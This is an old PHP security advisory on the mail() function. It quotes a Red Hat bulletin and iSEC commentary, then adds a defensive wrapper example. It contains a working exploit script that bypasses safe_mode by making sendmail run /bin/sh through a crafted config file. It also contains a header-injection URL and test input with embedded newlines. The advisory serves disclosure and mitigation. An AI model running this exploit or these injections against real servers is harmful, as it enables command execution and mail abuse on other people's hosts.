21st Aug 2002 [SBWID-5650]
COMMAND
PHP arbitrary commands execution
SYSTEMS AFFECTED
versions earlier than 4.1.0
PROBLEM
From the Red Hat Security Advisory [RHSA-2002:102-26]:
--snipp--
PHP is an HTML-embedded scripting language commonly used with Apache.
PHP versions 4.0.5 through 4.1.0 in safe mode do not properly cleanse
the 5th parameter to the mail() function. This vulnerability allows
local users and possibly remote attackers to execute arbitrary commands
via shell metacharacters.
--snapp--
Wojciech Purczynski [cliph@isec.pl] of iSEC Security Research
[http://isec.pl/] comments:
(1) Bypassing safe_mode restriction
If PHP is configured with the safe_mode option enabled, special restrictions
are set up, including a limit on the external binaries that may be executed
from within a PHP script.
The 5th argument to the mail() function (introduced in version 4.0.5)
allows specifying command line options to the sendmail binary. Some time
ago a bug was found in the mail() function that allowed passing shell
meta-characters in the 5th argument, leading to execution of arbitrary shell
commands or external binaries. This bug was fixed in version 4.1.0.
However, the mail() function is still vulnerable because it allows passing
command line arguments to the sendmail binary, which gives the ability
to influence its behavior (i.e. by using non-default aliases or custom
configuration files; other cases are possible with other MTAs).
Passing the 5th argument should be disabled if PHP is configured in
safe_mode.
Exploit attached at the end.
(2) Injecting ASCII control characters into mail() arguments
Arbitrary ASCII control characters may be injected into the string
arguments of the mail() function. If mail() arguments are taken from
user input, it may give the user the ability to alter message content,
including mail headers.
An example of such a vulnerability may be found on the PHP.net site:
http://www.php.net/mailing-lists.php?maillist=your@email.com%0a&email=fake@from.net%0a
PHP should do content filtering before creating message body sent with
"sendmail -t" command.
Impact:
=======
(1) Any user may bypass safe_mode restrictions if the mail() function is not
disabled.
(2) A PHP script becomes an open relay if user data is poorly filtered, or
not filtered at all, before being passed to the mail() function.
Exploit:
========
Sample exploit for (1) that works with the sendmail MTA:
-----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
-----8<----- bypass_safe_mode.php -----8<-----
SOLUTION
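As an added example (not part of the original advisory, of iSEC's comment or of PHP itself), the following wrapper around mail() implements the two mitigations the text asks for: it refuses to pass any 5th argument to sendmail under safe_mode and otherwise allows only a validated envelope sender (section 1), and it rejects ASCII control characters in every header-bearing argument before "sendmail -t" parses them (section 2). The function names, parameters and the sample input are this example's own assumptions.

```php
<?php
// Added example, not code from the original advisory, from iSEC or from the
// PHP project: a wrapper around mail() that applies the two checks the
// advisory calls for. Names (safe_mail, has_control_chars, is_plain_address
// and the parameters) are this example's own assumptions.
//
//  (1) Extra sendmail options: never pass a 5th argument under safe_mode,
//      and outside safe_mode allow only "-f<address>" with a validated
//      address, so a script cannot steer sendmail via options such as -C.
//  (2) Header injection: reject ASCII control characters (CR, LF, NUL, ...)
//      in every header-bearing argument, so user input cannot add or alter
//      message headers when sendmail parses them with "-t".

function has_control_chars($value)
{
    // Bytes 0x00-0x1F and 0x7F; this catches the %0a / %0d injection shown
    // in the advisory's PHP.net example.
    return preg_match('/[\x00-\x1F\x7F]/', $value) === 1;
}

function is_plain_address($address)
{
    // Deliberately strict: one mailbox, no display name, no comments.
    return preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/', $address) === 1;
}

// $extra_headers is an array of header name => value. The body may contain
// newlines, because sendmail only parses headers up to the first blank line.
function safe_mail($to, $subject, $body, $extra_headers = array(), $envelope_from = null)
{
    // Check (2): the recipient and subject must be single-line values.
    if (has_control_chars($to) || has_control_chars($subject)) {
        error_log('safe_mail: control character in To/Subject, message not sent');
        return false;
    }
    if (!is_plain_address($to)) {
        error_log('safe_mail: recipient is not a plain address, message not sent');
        return false;
    }

    // Each extra header is validated separately and joined with CRLF here,
    // so callers never get to supply raw line breaks themselves.
    $header_lines = array();
    foreach ($extra_headers as $name => $value) {
        if (!preg_match('/^[A-Za-z][A-Za-z0-9-]*$/', $name) || has_control_chars($value)) {
            error_log("safe_mail: bad header '$name', message not sent");
            return false;
        }
        $header_lines[] = $name . ': ' . $value;
    }
    $header_string = implode("\r\n", $header_lines);

    // Check (1): the 5th argument is the advisory's safe_mode concern.
    if ($envelope_from === null) {
        return mail($to, $subject, $body, $header_string);
    }
    if (ini_get('safe_mode')) {
        error_log('safe_mail: refusing to pass sendmail options under safe_mode');
        return false;
    }
    if (!is_plain_address($envelope_from)) {
        error_log('safe_mail: invalid envelope sender, message not sent');
        return false;
    }
    // Only the envelope sender reaches sendmail's command line, and only
    // after it passed the strict address check above.
    return mail($to, $subject, $body, $header_string, '-f' . $envelope_from);
}

// Constructed input mirroring the advisory's PHP.net example: the embedded
// newline in the recipient would otherwise let the caller append a header.
$sent = safe_mail("your@email.com\nBcc: someone@example.net",
                  'Hello', 'Body text', array('Reply-To' => 'fake@from.net'));
if (!$sent) {
    echo "injection attempt rejected before sendmail was invoked\n";
}
?>
```

With the constructed input above, safe_mail() returns false from the control-character check, so sendmail is never invoked; the same call with a plain recipient address goes through mail() with the Reply-To header assembled by the wrapper rather than by the caller. Using an array for extra headers is the design choice that makes check (2) enforceable: a free-form header string would have to permit line breaks, which is exactly what an injected %0a exploits.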